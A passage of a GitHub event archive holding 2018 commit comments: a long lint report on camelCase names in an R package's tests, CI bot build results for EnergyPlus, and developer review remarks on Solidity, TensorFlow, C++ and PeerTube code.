mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:322:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L322) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:323:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L323) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:324:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L324) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)), \"10023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:329:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:331:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:333:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:334:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L334) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:338:20:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L338) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:343:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L343) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:346:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:351:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:358:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L358) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/tests-deprecated/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:147:9:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-util.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:469:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-valid.R#L469) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:474:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-valid.R#L474) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:479:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-valid.R#L479) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:304:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:305:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L305) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:306:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L306) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:307:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L307) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:308:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L308) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:309:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:315:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L315) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:316:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L316) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:317:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L317) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:318:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L318) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:328:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L328) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:329:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:330:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L330) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:331:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:332:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L332) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:333:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:339:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L339) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:341:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L341) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:344:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L344) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:346:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:349:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L349) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:351:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:361:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L361) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:362:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L362) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:366:20:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L366) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:371:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L371) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:374:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L374) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:379:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L379) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:385:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L385) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:386:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L386) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:387:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-convert.R#L387) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/testthat/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/testthat/test-util.R:142:9:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-util.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:504:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-valid.R#L504) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:509:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-valid.R#L509) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:514:8:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/testthat/test-valid.R#L514) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T17:04:21Z"}
{"id":"7990462854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29767725,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T17:04:46Z","updated_at":"2018-07-19T17:04:46Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2323 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-19T17:04:46Z"}
{"id":"7990464040","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29767727,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-19T17:05:01Z","updated_at":"2018-07-19T17:05:01Z","author_association":"NONE","body":"If you make this call to a node you trust, then it is ok. Making it to Infura may not be a good idea in principle."}},"created_at":"2018-07-19T17:05:01Z"}
{"id":"7990465278","type":"CommitCommentEvent","actor":{"login":"jim-meyer"},"repo":{"name":"tensorflow/models"},"payload":{"comment":{"id":29767730,"position":24,"line":842,"path":"research/object_detection/utils/object_detection_evaluation.py","commit_id":"32e7d660a813c11da61a2ad35055d85df8f14b63","created_at":"2018-07-19T17:05:16Z","updated_at":"2018-07-19T17:05:16Z","author_association":"NONE","body":"This line gives the following syntax error on python 3 (3.6.6 to be exact):\r\n(tensorflow_p36) ubuntu@ip-172-31-0-236:~/weed_detector$ python ${ML_MODELS_PATH}/research/object_detection/model_main.py --model_dir=/ml/modeldata/${image_reduction_factor}/train --pipeline_config_path=/ml/modeldata/pipeline_${image_reduction_factor}.config\r\n/home/ubuntu/anaconda3/envs/tensorflow_p36/lib/python3.6/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\r\n  from ._conv import register_converters as _register_converters\r\nTraceback (most recent call last):\r\n  File \"/home/ubuntu/models/research/object_detection/model_main.py\", line 26, in <module>\r\n    from object_detection import model_lib\r\n  File \"/home/ubuntu/models/research/object_detection/model_lib.py\", line 26, in <module>\r\n    from object_detection import eval_util\r\n  File \"/home/ubuntu/models/research/object_detection/eval_util.py\", line 28, in <module>\r\n    from object_detection.metrics import coco_evaluation\r\n  File \"/home/ubuntu/models/research/object_detection/metrics/coco_evaluation.py\", line 21, in <module>\r\n    from object_detection.utils import object_detection_evaluation\r\n  File \"/home/ubuntu/models/research/object_detection/utils/object_detection_evaluation.py\", line 842\r\n    print 'Scores and tpfp per class label: {}'.format(class_index)\r\n                                              ^\r\nSyntaxError: invalid syntax\r\n\r\n\r\nDid you mean to use {0}?"}},"created_at":"2018-07-19T17:05:16Z"}
{"id":"7990468440","type":"CommitCommentEvent","actor":{"login":"nlohmann"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767737,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T17:06:00Z","updated_at":"2018-07-19T17:06:00Z","author_association":"OWNER","body":"I tried\r\n\r\n```cpp\r\nNLOHMANN_BASIC_JSON_TPL_DECLARATION\r\ninline void swap<NLOHMANN_BASIC_JSON_TPL>(NLOHMANN_BASIC_JSON_TPL& j1, NLOHMANN_BASIC_JSON_TPL& j2) noexcept(\r\n    is_nothrow_move_constructible<NLOHMANN_BASIC_JSON_TPL>::value and\r\n    is_nothrow_move_assignable<NLOHMANN_BASIC_JSON_TPL>::value\r\n)\r\n```\r\n\r\nand got\r\n\r\n```\r\n error: function template partial specialization is not allowed\r\ninline void swap<NLOHMANN_BASIC_JSON_TPL>(NLOHMANN_BASIC_JSON_TPL& j1, NLOHMANN_BASIC_JSON_TPL& j2) noexcept(\r\n            ^   ~~~~~~~~~~~~~~~~~~~~~~~~~\r\n```"}},"created_at":"2018-07-19T17:06:00Z"}
{"id":"7990469140","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29767738,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T17:06:09Z","updated_at":"2018-07-19T17:06:09Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T17:06:09Z"}
{"id":"7990469645","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29767741,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-19T17:06:16Z","updated_at":"2018-07-19T17:06:16Z","author_association":"NONE","body":"Of course you _can_ use `keccak256` in the contract. You have to find the proper combination of hashing here, or hashing off-chain or not requiring any hash."}},"created_at":"2018-07-19T17:06:16Z"}
{"id":"7990470272","type":"CommitCommentEvent","actor":{"login":"rigelk"},"repo":{"name":"YunoHost-Apps/peertube_ynh"},"payload":{"comment":{"id":29767744,"position":null,"line":null,"path":null,"commit_id":"1d63c3fea98aee0d5e61b28fc7db9af14d073e3b","created_at":"2018-07-19T17:06:23Z","updated_at":"2018-07-19T17:06:23Z","author_association":"MEMBER","body":"`yarn install --pure-lockfile && npm run build`, but honestly better wait for the next release. It shouldn't be long before we release it and the changes you want will be in there."}},"created_at":"2018-07-19T17:06:23Z"}
{"id":"7990470671","type":"CommitCommentEvent","actor":{"login":"joshuamango"},"repo":{"name":"joshuamango/tuokaerb"},"payload":{"comment":{"id":29767746,"position":null,"line":null,"path":null,"commit_id":"4de080fc07a89288f9b7b01f4f779c16ba472ee9","created_at":"2018-07-19T17:06:29Z","updated_at":"2018-07-19T17:06:29Z","author_association":"OWNER","body":"Removed vertical movement of the paddle"}},"created_at":"2018-07-19T17:06:29Z"}
{"id":"7990473423","type":"CommitCommentEvent","actor":{"login":"iblank"},"repo":{"name":"valor-software/ng2-dragula"},"payload":{"comment":{"id":29767750,"position":null,"line":null,"path":null,"commit_id":"87ad23f3a69dd678c3f23d5201ff5973f146c23a","created_at":"2018-07-19T17:07:05Z","updated_at":"2018-07-19T17:07:05Z","author_association":"CONTRIBUTOR","body":"Oh yeah, I see what you're saying... since it's set on the options, which could be shared between directives, it doesn't work on the directive level.\r\n\r\nIt's too bad Dragula doesn't provide a way to update options, because then we could potentially set the mirrorContainer on dragstart."}},"created_at":"2018-07-19T17:07:05Z"}
